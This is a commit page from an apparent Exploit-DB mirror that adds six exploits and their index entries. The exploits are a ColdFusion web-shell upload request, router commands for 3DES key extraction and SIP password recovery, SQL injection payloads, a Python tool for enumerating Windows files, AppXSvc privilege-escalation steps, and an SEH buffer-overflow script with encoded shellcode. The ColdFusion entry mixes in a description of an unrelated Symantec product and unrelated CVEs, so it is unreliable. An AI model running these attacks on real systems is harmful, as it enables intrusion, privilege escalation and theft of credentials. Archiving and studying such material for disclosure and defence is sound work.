bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-09-17

Browse source 
6 changes to exploits/shellcodes

Windows NTFS - Privileged File Access Enumeration
AppXSvc - Privilege Escalation
docPrint Pro 8.0 - SEH Buffer Overflow

Inteno IOPSYS Gateway - Improper Access Restrictions
Symantec Advanced Secure Gateway (ASG) / ProxySG - Unrestricted File Upload
CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection
This commit is contained in:
Offensive Security 2019-09-17 05:02:21 +00:00
parent a6db0c9d90
commit b6378fddcc
7 changed files with 818 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

64
exploits/cfm/webapps/47392.txt Normal file
View file

@ -0,0 +1,64 @@
===========Security Intelligence============
# Vendor Homepage: adobe.com
# Version: 2018
# Tested on: Adobe ColdFusion 2018
# Exploit Author: Pankaj Kumar Thakur (Nepal)
==========[Table of Contents]==============
* Overview
* Detailed description
* Thanks & Acknowledgements
* References
==========[Vulnerability Information]========
* Unrestricted file upload in Adobe ColdFusion 2018
* CWE-434
* Base Score: 6.8 MEDIUM
* Vector: AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H
=========[ Overview]=========================
* System Affected: Adobe ColdFusion 2018
* Impact: Unrestricted file upload
=====[ Detailed description]=================
Unrestricted file upload vulnerability in the Symantec Advanced Secure Gateway (ASG) and ProxySG management consoles. A malicious appliance administrator can upload arbitrary malicious files to the management console and trick another administrator user into downloading and executing malicious code.
Request
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
HTTP/1.1
Host: hostname:portno
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Content-Type: multipart/form-data;
Content-Length: 303
Connection: close
Upgrade-Insecure-Requests: 1
.
.
-----------------------------24464570528145
Content-Disposition: form-data; name="file"; filename="shell_file with extension"
Content-Type: image/jpeg
shell code
-----------------------------24464570528145
Content-Disposition: form-data; name="path"
.
.
After uploading shell, its located here
http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file with extension
=====[ Thanks & Acknowledgements]========================================
* Acknowledged by Adobe
* Duplicate
* https://nvd.nist.gov/vuln/detail/CVE-2016-10258
* https://www.cvedetails.com/cve/CVE-2016-1713/
* https://www.openwall.com/lists/oss-security/2016/01/12/4
=====[ EOF ]===========================================================

96
exploits/hardware/remote/47390.txt Normal file
View file

@ -0,0 +1,96 @@
# Exploit Title: Inteno IOPSYS Gateway 3DES Key Extraction - Improper Access Restrictions
# Date: 2019-06-29
# Exploit Author: Gerard Fuguet (gerard@fuguet.cat)
# Vendor Homepage: https://www.intenogroup.com/
# Version: EG200-WU7P1U_ADAMO3.16.4-190226_1650
# Fixed Version: EG200-WU7P1U_ADAMO3.16.8-190820_0937
# Affected Component: SIP password, Info Gathering of Network Config
# Attack Type: Remote
# Tested on: Kali Linux 2019.2 against an Inteno EG200 Router
# CVE : CVE-2019-13140
# Description:
Inteno EG200 EG200-WU7P1U_ADAMO3.16.4-190226_1650 and before
firmwares routers have a JUCI ACL misconfiguration that allows
the "user" account to extract the 3DES key via JSON commands to ubus.
The 3DES key is used to decrypt the provisioning file provided by
Adamo Telecom on a public URL via cleartext HTTP.
# Attack Vectors:
To get success on the exploitation, two components are mandatory: 1.
the encrypted file (.enc) and 2. The 3DES key for decrypt it. The
encrypted file can be downloaded via HTTP URL offered by Adamo ISP
(works from any external network). Then is need to interact with the
router using WebSocket protocol to obtain the 3DES key, a web browser
like Firefox can be used as WebSocket client under the developer
tools. Session id is acquired with the same username and password of
the router (in this case, password is the same as wifi defaults). Once
3DES key is obtained through a JSON request command, .enc file can be
decrypted with the help of openssl tool.
# PoC:
Step 1: Getting the provisioning file
Download from http://inteno-provisioning.adamo.es/XXXXXXXXXXXX.enc
Where XXXXXXXXXXXX is your routers Inteno MAC, all in capitals and without
the colons. You can also get your MAC by doing a ping to the router
and then an arp command on terminal.
Step 2: The 3DES Key
Let's communcatie by Sockets
- Using Firefox, open the routers webpage (192.168.1.1 by default).
- Invoke the developer tools by pressing F12 and go to the Console Tab.
- Lets create the WebSocket:
var superSocket = new WebSocket("ws://192.168.1.1/", "ubus-json")
- And creating the Log for show responses in each petition:
superSocket.onmessage = function (event) {console.log(event.data)}
- We request an ID session with the same login parameters that when access
to the routers website. (put your wifis router password instead of
wifis-password value):
superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["00000000000000000000000000000000","session","login",{"username":"user","password":"wifis-password"}],"id":666}))
- Now, you will obtain a response, the value of the parameter that says
“ubus_rpc_session” refers to your sessions ID, copy it to use in the next
request call.
- Requesting information about the routers System. (put your session ID
instead of put-your-session-id-here value):
superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["put-your-session-id-here","router.system","info",{}],"id":999}))
- On the response obtained, copy the value of the “des” parameter.
Its 16 digits that we need convert to hexadecimal.
Step 3: Ready for Decrypting
Convert to HEX using xxd tool where XXXXXXXXXXXXXXXX is your "des" key:
echo -n XXXXXXXXXXXXXXXX | xxd -p
- Use openssl tool to decrypt your provisioning file. (Put your "des" key
instead of your-des-key-in-hex-format value and the XXXXXXXXXXXX
refers the name of your encryption provisioning file, in the -out
value, the name can be different):
openssl enc -d -des-ede -nosalt -K your-des-key-in-hex-format -in XXXXXXXXXXXX.enc -out XXXXXXXXXXXX.tar.gz
- Uncompress the decrypted file:
tar -xzvf XXXXXXXXXXXX.tar.gz
- You get the file: Provisioning.conf.
- Showing the file:
cat Provisioning.conf
- The end of the line refers to the secret, the password of your
SIP account.
A video was created to show all these Steps in action:
https://youtu.be/uObz1uE5P4s
# Additional Information:
A packet sniffer like Wireshark can be used for retrieve the 3DES key
instead of using WebSocket communication protocol. In that case, user
needs to do the login on the router's page, and then the JSON request
containing the 3DES key will be catched.
# References:
https://twitter.com/GerardFuguet/status/1169298861782896642
https://www.slideshare.net/fuguet/call-your-key-to-phone-all
# Timeline:
2019-06-29 - White Paper done
2019-07-01 - CVE assigned
2019-07-09 - Notified to Inteno
2019-07-11 - Adamo aware and ask for detailed info
2019-07-12 - Info facilitated
2019-07-25 - Early patch available and applied (Cooperation starts)
2019-07-26 - Tested and failed (VoIP not working)
2019-08-27 - New firmware available
2019-08-30 - Firmware EG200-WU7P1U_ADAMO3.16.8-190820_0937 applied on router
2019-08-31 - Tested OK
2019-09-04 - Disclosure published

27
exploits/php/webapps/47395.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection
# Author: Cakes
# Discovery Date: 2019-09-16
# Vendor Homepage: https://github.com/SaloniKumari123/CollegeManagementSystem
# Software Link: https://github.com/SaloniKumari123/CollegeManagementSystem/archive/master.zip
# Tested Version: 1.3
# Tested on OS: CentOS 7
# CVE: N/A
# Description:
# Another College Management system coded in PHP, most input values accounted for and sanitized, except this one :-)
# Parameter: batch (GET)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause
Payload: batch=-9643' OR 9247=9247-- aqgq
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: batch=2021' AND (SELECT 6451 FROM (SELECT(SLEEP(5)))CWMt)-- zEfe
# Type: UNION query
# Title: Generic UNION query (NULL) - 3 columns
Payload: batch=2021' UNION ALL SELECT NULL,CONCAT(0x71786a6271,0x564f6e51546c6f634741454d714e5777716d427361504d7a794b686c50657472724d616f49674b51,0x7171627171),NULL-- pPUb

458
exploits/windows/local/47357.py Executable file
View file

@ -0,0 +1,458 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NTFS-PRIVILEGED-FILE-ACCESS-ENUMERATION.txt
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Windows NTFS
NTFS is a proprietary journaling file system developed by Microsoft. Starting with Windows NT 3.1, it is the default file system of the Windows NT family.
[Vulnerability Type]
Privileged File Access Enumeration
[CVE Reference]
N/A
[Security Issue]
Attackers possessing user-only rights can gather intelligence or profile other user account activities by brute forcing a correct file name.
This is possible because Windows returns inconsistent error messages when accessing unauthorized files that contain a valid extension
or have a "." (dot) as part of the file or folder name.
Typically, you see enumeration in web-application attacks which target account usernames. In this case we are targeting the filenames
of other users, maybe we need to locate files up front that we wish to steal possibly prior to launching say an XXE exploit to steal
those files or maybe we just passively sniff the accounts directories to profile the mark and or learn their daily activities.
Standard account users attempting to open another users files or folders that do not contain a valid extension or dot "." in its filename
are always issued the expected "Access is denied" system error message.
However, for files that contain a (dot) in the filename and that also don't exist, the system echoes the following attacker friendly warning:
"The system cannot find the file".
This error message inconsistency allows attackers to infer files EXIST, because any other time we would get "The system cannot find the file".
Example, the Windows commands DIR or TYPE always greet attackers with an expected "Access is denied" message, whether the file exists or not.
This helps protect users from having their local files known to attackers, since the system returns the same message regardless if files
exist or not when using those commands. Those commands output messages are not affected by the file having a valid extension or not.
However, we can bypass that protection by avoiding the Windows DIR or TYPE commands and instead attempt to directly open any inaccessible
users file on the command line much like calling a program and pressing the enter key.
After the Win32 API function CreateFile is called an it returns either:
1) "The system cannot find the file"
2) "Access is denied"
C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Hubert Dingleberry.contact
The system cannot find the file <==== DOES NOT EXIST
C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.contact
Access is denied. <===== EXISTS
C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.con
The system cannot find the file <==== DOES NOT EXIST
C:\Users\noprivs>c:\Users\privileged-victim\Contacts\whatever
Access is denied. <===== FALSE POSITIVE NO EXTENSION PRESENT IN THE FILENAME
From a defensive perspective we can leverage this to try to detect basic IOC and malware artifacts like .tmp, .ini, .dll, .exe
or related config files on disk with user-only rights, instead of authenticating with admin rights as a quick paranoid first pass.
Example, if malware hides itself by unlinking themselves from the EPROCESS list in memory or using programs like WinRAP to hide
processess from Windows TaskMgr, we may not discover them even if using tasklist command. The EPROCESS structure and flink/blink is
how Windows TaskMgr shows all running processes. However, we may possibly detect them by testing for the correct IOC name if the
malicious code happens to reside on disk and not only in memory. Whats cool is we can be do this without the need for admin rights.
Other Windows commands that will also let us confirm file existence by comparing error messages are start, call, copy, icalcs, and cd.
However, Windows commands rename, ren, cacls, type, dir, erase, move or del commands will issue flat out "Access is denied" messages.
Previously, MSRC recommended using ABE. However, that feature is only for viewing files and folders in a shared folder, not when viewing
files or folders in the local file system.
Tested successfully Win7/10
[Exploit/POC]
"NtFileSins.py"
from subprocess import Popen, PIPE
import sys,argparse,re
# NtFileSins v2.1
# Added: Check for Zone.Identifer:$DATA to see if any identified files were downloaded from internet.
# Fixed: save() logic to log report in case no Zone.Identifiers found.
#
# Windows File Enumeration Intel Gathering.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message,
# when a file exists or doesn't exist, when restricted access is attempted by another user.
#
# However, accessing files directly by attempting to "open" them from cmd.exe shell,
# we can determine existence by compare inconsistent Windows error messages.
#
# Requirements: 1) target users with >= privileges (not admin to admin).
# 2) artifacts must contain a dot "." or returns false positives.
#
# Windows message "Access Denied" = Exists
# Windows message "The system cannot find the file" = Not exists
# Windows returns "no message" OR "c:\victim\artifact is not recognized as an internal or external command,
# operable program or batch file" = Admin to Admin so this script is not required.
#
# Profile other users by compare ntfs error messages to potentially learn their activities or machines purpose.
# For evil or maybe check for basic malware IOC existence on disk with user-only rights.
#
#======================================================================#
# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.1 #
# By John Page (aka hyp3rlinx) #
# Apparition Security #
#======================================================================#
BANNER='''
_ _______________ __ _____ _
/ | / /_ __/ ____(_) /__ / ___/(_)___ _____
/ |/ / / / / /_ / / / _ \\__ \ / / __ \/ ___/
/ /| / / / / __/ / / / __/__/ / / / / (__ )
/_/ |_/ /_/ /_/ /_/_/\___/____/_/_/ /_/____/ v2.1
By hyp3rlinx
ApparitionSec
'''
sin_cnt=0
internet_sin_cnt=0
found_set=set()
zone_set=set()
ARTIFACTS_SET=set()
ROOTDIR = "c:/Users/"
ZONE_IDENTIFIER=":Zone.Identifier:$DATA"
USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures",
"Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"]
APPDATA_DIR=["AppData/Local/Temp"]
EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3", ".bat",
".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"])
REPORT="NtFileSins_Log.txt"
def usage():
print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n"
print '-u victim -d Searches -a "MS17-020 - Google Search.url"'
print '-u victim -a "<name.ext>"'
print "-u victim -d Downloads -a <name.ext> -s"
print '-u victim -d Contacts -a "Mike N.contact"'
print "-u victim -a APT.txt -b -n"
print "-u victim -d -z Desktop/MyFiles -a <.name>"
print "-u victim -d Searches -a <name>.search-ms"
print "-u victim -d . -a <name.ext>"
print "-u victim -d desktop -a inverted-crosses.mp3 -b"
print "-u victim -d Downloads -a APT.exe -b"
print "-u victim -f list_of_files.txt"
print "-u victim -f list_of_files.txt -b -s"
print "-u victim -f list_of_files.txt -x .txt"
print "-u victim -d desktop -f list_of_files.txt -b"
print "-u victim -d desktop -f list_of_files.txt -x .rar"
print "-u victim -z -s -f list_of_files.txt"
def parse_args():
parser.add_argument("-u", "--user", help="Privileged user target")
parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search <e.g. Downloads>.")
parser.add_argument("-a", "--artifact", help="Single artifact we want to verify exists.")
parser.add_argument("-t", "--appdata", nargs="?", const="1", help="Searches the AppData/Local/Temp directory.")
parser.add_argument("-f", "--artifacts_from_file", nargs="?", help="Enumerate a list of supplied artifacts from a file.")
parser.add_argument("-n", "--notfound", nargs="?", const="1", help="Display unfound artifacts.")
parser.add_argument("-b", "--built_in_ext", nargs="?", const="1", help="Enumerate files using NtFileSin built-in ext types, if no extension is found NtFileSins will switch to this feature by default.")
parser.add_argument("-x", "--specific_ext", nargs="?", help="Enumerate using specific ext, e.g. <.exe> using a supplied list of artifacts, a supplied ext will override any in the supplied artifact list.")
parser.add_argument("-z", "--zone_identifier", nargs="?", const="1", help="Identifies artifacts downloaded from the internet by checking for Zone.Identifier:$DATA.")
parser.add_argument("-s", "--save", nargs="?", const="1", help="Saves successfully enumerated artifacts, will log to "+REPORT)
parser.add_argument("-v", "--verbose", nargs="?", const="1", help="Displays the file access error messages.")
parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show example usage.")
return parser.parse_args()
def access(j):
result=""
try:
p = Popen([j], stdout=PIPE, stderr=PIPE, shell=True)
stderr,stdout = p.communicate()
result = stdout.strip()
except Exception as e:
#print str(e)
pass
return result
def artifacts_from_file(artifacts_file, bflag, specific_ext):
try:
f=open(artifacts_file, "r")
for a in f:
idx = a.rfind(".")
a = a.strip()
if a != "":
if specific_ext:
if idx==-1:
a = a + specific_ext
else:
#replace existing ext
a = a[:idx] + specific_ext
if bflag:
ARTIFACTS_SET.add(a)
else:
ARTIFACTS_SET.add(a)
f.close()
except Exception as e:
print str(e)
exit()
def save():
try:
f=open(REPORT, "w")
for j in found_set:
f.write(j+"\n")
f.close()
except Exception as e:
print str(e)
def recon_msg(s):
if s == 0:
return "Access is denied."
else:
return "\t[*] Artifact exists ==>"
def echo_results(args, res, x, i):
global sin_cnt
if res=="":
print "\t[!] No NTFS message, you must already be admin, then this script is not required."
exit()
if "not recognized as an internal or external command" in res:
print "\t[!] You must target users with higher privileges than yours."
exit()
if res != recon_msg(0):
if args.verbose:
print "\t"+res
else:
if args.notfound:
print "\t[-] not found: " + x +"/"+ i
else:
sin_cnt += 1
if args.save or args.zone_identifier:
found_set.add(x+"/"+i)
if args.verbose:
print recon_msg(1)+ x+"/"+i
print "\t"+res
else:
print recon_msg(1)+ x+"/"+i
def valid_artifact_name(sin,args):
idx = "." in sin
if re.findall(r"[/\\*?:<>|]", sin):
print "\t[!] Skipping: disallowed file name character."
return False
if not idx and not args.built_in_ext and not args.specific_ext:
print "\t[!] Warning: '"+ sin +"' has no '.' in the artifact name, this can result in false positives."
print "\t[+] Searching for '"+ sin +"' using built-in ext list to prevent false positives."
if not args.built_in_ext:
if sin[-1] == ".":
print "\t[!] Skipping: "+sin+" non valid file name."
return False
return True
def search_missing_ext(path,args,i):
for x in path:
for e in EXTS:
res = access(ROOTDIR+args.user+"/"+x+"/"+i+e)
echo_results(args, res, x, i+e)
#Check if the found artifact was downloaded from internet
def zone_identifier_check(args):
global ROOTDIR, internet_sin_cnt
zone_set.update(found_set)
for c in found_set:
c = c + ZONE_IDENTIFIER
res = access(ROOTDIR+args.user+"/"+c)
if res == "Access is denied.":
internet_sin_cnt += 1
print "\t[$] Zone Identifier found: "+c+" this file was downloaded over the internet!."
zone_set.add(c)
def ntsins(path,args,i):
if i.rfind(".")==-1:
search_missing_ext(path,args,i)
i=""
for x in path:
if i != "":
if args.built_in_ext:
for e in EXTS:
res = access(ROOTDIR+args.user+"/"+x+"/"+i+e)
echo_results(args, res, x, i+e)
elif args.specific_ext:
idx = i.rfind(".")
if idx == -1:
i = i + "."
else:
i = i[:idx] + args.specific_ext
res = access(ROOTDIR+args.user+"/"+x+"/"+i)
echo_results(args, res, x, i)
def search(args):
print "\tSearching...\n"
global ROOTDIR, USER_DIRS, ARTIFACTS_SET
if args.artifact:
ARTIFACTS_SET = set([args.artifact])
for i in ARTIFACTS_SET:
idx = i.rfind(".") + 1
if idx and args.built_in_ext:
i = i[:idx -1:None]
if len(i) > 0 and i != None:
if valid_artifact_name(i,args):
#specific user dir search
if args.directory:
single_dir=[args.directory]
ntsins(single_dir,args,i)
#search appdata dirs
elif args.appdata:
ntsins(APPDATA_DIR,args,i)
#all default user dirs
else:
ntsins(USER_DIRS,args,i)
def check_dir_input(_dir):
if len(re.findall(r":", _dir)) != 0:
print "[!] Check the directory arg, NtFileSins searches under c:/Users/target by default see Help -h."
return False
return True
def main(args):
if len(sys.argv)==1:
parser.print_help(sys.stderr)
sys.exit(1)
if args.examples:
usage()
exit()
if not args.user:
print "[!] No target user specified see Help -h"
exit()
if args.appdata and args.directory:
print "[!] Multiple search directories supplied see Help -h"
exit()
if args.specific_ext:
if "." not in args.specific_ext:
print "[!] Must use full extension e.g. -x ."+args.specific_ext+", dot in filenames mandatory to prevent false positives."
exit()
if args.artifact and args.artifacts_from_file:
print "[!] Multiple artifacts specified, use just -f or -a see Help -h"
exit()
if args.built_in_ext and args.specific_ext:
print "\t[!] Both specific and built-in extensions supplied, use only one."
exit()
if args.specific_ext and not args.artifacts_from_file:
print "\t[!] -x to be used with -f flag only see Help -h."
exit()
if args.artifact:
if args.artifact.rfind(".")==-1:
print "\t[!] Artifacts must contain a .ext or will result in false positives."
exit()
if args.directory:
if not check_dir_input(args.directory):
exit()
if args.artifacts_from_file:
artifacts_from_file(args.artifacts_from_file, args.built_in_ext, args.specific_ext)
if not args.artifact and not args.artifacts_from_file:
print "[!] Exiting, no artifacts supplied see Help -h"
exit()
else:
search(args)
if sin_cnt >= 1 and args.zone_identifier:
zone_identifier_check(args)
if args.save and len(found_set) != 0 and not args.zone_identifier:
save()
if args.save and len(zone_set) != 0:
found_set.update(zone_set)
save()
print "\n\tNtFileSins Detected "+str(sin_cnt)+ " out of %s" % str(len(ARTIFACTS_SET)) + " Sins.\n"
if args.zone_identifier and internet_sin_cnt >= 1:
print "\t"+str(internet_sin_cnt) + " of the sins were internet downloaded.\n"
if not args.notfound:
print "\tuse -n to display unfound enumerated files."
if not args.built_in_ext:
print "\tfor extra search coverage try -b flag or targeted artifact search -a."
if __name__ == "__main__":
print BANNER
parser = argparse.ArgumentParser()
main(parse_args())
[POC Video URL]
https://www.youtube.com/watch?v=rm8kEbewqpI
[Network Access]
Remote/Local
[Severity]
Low
[Disclosure Timeline]
Vendor Notification: July 29, 2019
MSRC "does not meet the bar for security servicing" : July 29, 2019
September 5, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

53
exploits/windows/local/47389.txt Normal file
View file

@ -0,0 +1,53 @@
#-----------------------------------------------------------------------------#
# Exploit Title: AppXSvc - Arbitrary File Security Descriptor Overwrite (EoP) #
# Date: Sep 4 2019 #
# Exploit Author: Gabor Seljan #
# Vendor Homepage: https://www.microsoft.com/ #
# Version: 17763.1.amd64fre.rs5_release.180914-1434 #
# Tested on: Windows 10 Version 1809 for x64-based Systems #
# CVE: CVE-2019-1253 #
#-----------------------------------------------------------------------------#
Summary:
AppXSvc improperly handles file hard links resulting in a low privileged user
being able to take 'Full Control' of an arbitrary file leading to elevation of
privilege.
Description:
An elevation of privilege vulnerability exists when the AppX Deployment Server
(AppXSvc) improperly handles file hard links. While researching CVE-2019-0841
originally reported by Nabeel Ahmed, I have found that AppXSvc sometimes opens
the settings.dat[.LOGx] files of Microsoft Edge for a restore operation that
modifies the security descriptor of the files. Further analyzis revealed that
the restore operation can be triggered on demand by preventing AppXSvc from
accessing the settings.dat[.LOGx] files. This can be achieved by locking the
settings.dat[.LOGx] file, resulting in 'Access Denied' and 'Sharing Violation'
errors when Edge and AppXSvc are trying to access it. Eventually the restore
operation kicks in and if the settings.dat[.LOGx] file has been replaced with
a hard link AppXSvc will overwrite the security descriptor of the target file.
A low privileged user can leverage this vulnerability to take 'Full Control'
of an arbitrary file.
Steps to reproduce:
1. Terminate Edge.
2. Create a hard link from settings.dat.LOG2 to C:\Windows\win.ini.
3. Open the hard link for reading and lock the file.
4. Start Edge and wait a few seconds for the restore operation to kick in.
5. Unlock the file and close the file handle.
Expected result:
Full access (GENERIC_ALL) to C:\Windows\win.ini is denied.
Observed result:
C:\Windows\win.ini has had it's security descriptor rewritten to grant
'Full Control' to the low privileged user.
PoC files:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/47389.zip
References:
https://github.com/sgabe/CVE-2019-1253
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1253
https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841

114
exploits/windows/local/47394.py Executable file
View file

@ -0,0 +1,114 @@
import struct
# Title: docPrint Pro v8.0 'User/Master Password' Local SEH Alphanumeric Encoded Buffer Overflow
# Date: September 14th, 2019
# Author: Connor McGarr (@33y0re) (https://connormcgarr.github.io)
# Vendor Homepage: http://www.verypdf.com
# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
# Version: 8.0
# Tested on: Windows 10 and Windows 7
# TO RUN:
# 1. Create a blank file named "test.pdf"
# 2. Open doc2pdf_win.exe
# 3. When the application loads, go to Settings > PDF Security > and check "Encrypt PDF File"
# 4. Run this python script. Copy the contents and paste it into the "User Password" and "Master Password" fields and press "okay"
# 5. Click "Add File(s)"
# 6. Select the "test.pdf" file created from step 1.
# 7. Press on "Start" and name the file "exploit.pdf"
# Unusual bad characters include: \x01\x05\x07\x08\x09 (and the usual suspects that are not ASCII)
# Zero out registers for calculations.
zero = "\x25\x01\x01\x01\x01"
zero += "\x25\x10\x10\x10\x10"
# Stack alignment
alignment = "\x54" # push esp
alignment += "\x58" # pop eax
alignment += "\x2d\x1a\x50\x55\x55" # sub eax, 0x1a505555
alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555
alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555
alignment += "\x50" # push eax
alignment += "\x5c" # pop esp
# Custom created and encoded MessageBox POC shellcode.
# Utilized aplication DLL with no ASLR for Windows API call to MessageBox function.
# \x31\xc0\x50\x68
# \x42\x41\x4a\x41
# \x89\xe1\x50\x68
# \x42\x41\x4a\x41
# \x89\xe2\x50\x50
# \x51\x52\x50\xbe
# \x38\x20\x00\x10
# \xff\xe6\x41\x41
# 534F1555 534F0255 53500157 (bit of byte mangling after jmp esi, but works nonetheless!)
shellcode = zero # zero out eax
shellcode += "\x2d\x55\x15\x4f\x53" # sub eax, 0x534f1555
shellcode += "\x2d\x55\x02\x4f\x53" # sub eax, 0x534f0255
shellcode += "\x2d\x57\x01\x50\x53" # sub eax, 0x53500157
shellcode += "\x50" # push eax
# 4F554A42 4F554A42 51554B44
shellcode += zero # zero out eax
shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42
shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42
shellcode += "\x2d\x44\x4b\x55\x51" # sub eax, 0x51554b44
shellcode += "\x50" # push eax
# 153A393A 153A393A 173B3B3B
shellcode += zero
shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x173b3b3b
shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x153a393a
shellcode += "\x2d\x3b\x3b\x3b\x17" # sub eax, 0x173b3b3b
shellcode += "\x50" # push eax
# 3A3A1927 3A3A0227 3B3B0229
shellcode += zero # zero out eax
shellcode += "\x2d\x27\x19\x3a\x3a" # sub eax, 0x3a3a1927
shellcode += "\x2d\x27\x02\x3a\x3a" # sub eax, 0x3a3a0227
shellcode += "\x2d\x29\x02\x3b\x3b" # sub eax, 0x3b3b0229
shellcode += "\x50" # push eax
# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero # zero out eax
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040
shellcode += "\x50" # push eax
# 323A1A27 323A0227 333B0229
shellcode += zero # zero out eax
shellcode += "\x2d\x27\x1a\x3a\x32" # sub eax, 0x323a1a27
shellcode += "\x2d\x27\x02\x3a\x32" # sub eax, 0x323a0227
shellcode += "\x2d\x29\x02\x3b\x33" # sub eax, 0x333b0229
shellcode += "\x50" # push eax
# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero # zero out eax
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040
shellcode += "\x50" # push eax
# 323A1545 323A1545 333B1545
shellcode += zero # zero out eax
shellcode += "\x2d\x45\x15\x3a\x32" # sub eax, 0x323a1545
shellcode += "\x2d\x45\x15\x3A\x32" # sub eax, 0x323a1545
shellcode += "\x2d\x45\x15\x3b\x33" # sub eax, 0x333b1545
shellcode += "\x50" # push eax
# Let's roll.
payload = "\x41" * 1676
payload += "\x70\x06\x71\x06" # JO 6 bytes. If fails, JNO 6 bytes
payload += struct.pack('<L', 0x10011874) # pop ebp pop ebx ret reg.dll
payload += "\x41" * 2 # Padding to reach alignment
payload += alignment
payload += shellcode
payload += "\x45" * (6000-len(payload))
# Write to file
f = open('bajablast.txt', 'w')
f.write(payload)
f.close()

6
files_exploits.csv
View file

@ -10679,8 +10679,11 @@ id,file,description,date,author,type,platform,port
47341,exploits/windows/local/47341.txt,"Kaseya VSA agent 9.5 - Privilege Escalation",2019-09-02,NF,local,windows,
47344,exploits/linux/local/47344.rb,"ktsuss 1.4 - suid Privilege Escalation (Metasploit)",2019-09-03,Metasploit,local,linux,
47345,exploits/linux/local/47345.rb,"ptrace - Sudo Token Privilege Escalation (Metasploit)",2019-09-03,Metasploit,local,linux,
47357,exploits/windows/local/47357.py,"Windows NTFS - Privileged File Access Enumeration",2019-09-06,hyp3rlinx,local,windows,
47377,exploits/windows/local/47377.rb,"Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) (Metasploit)",2019-09-10,Metasploit,local,windows,
47378,exploits/windows/local/47378.rb,"Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry (Metasploit)",2019-09-10,Metasploit,local,windows,
47389,exploits/windows/local/47389.txt,"AppXSvc - Privilege Escalation",2019-09-16,"Gabor Seljan",local,windows,
47394,exploits/windows/local/47394.py,"docPrint Pro 8.0 - SEH Buffer Overflow",2019-09-16,"Connor McGarr",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17669,6 +17672,7 @@ id,file,description,date,author,type,platform,port
47358,exploits/linux/remote/47358.py,"FusionPBX 4.4.8 - Remote Code Execution",2019-09-06,Askar,remote,linux,
47375,exploits/linux/remote/47375.rb,"LibreNMS - Collectd Command Injection (Metasploit)",2019-09-10,Metasploit,remote,linux,
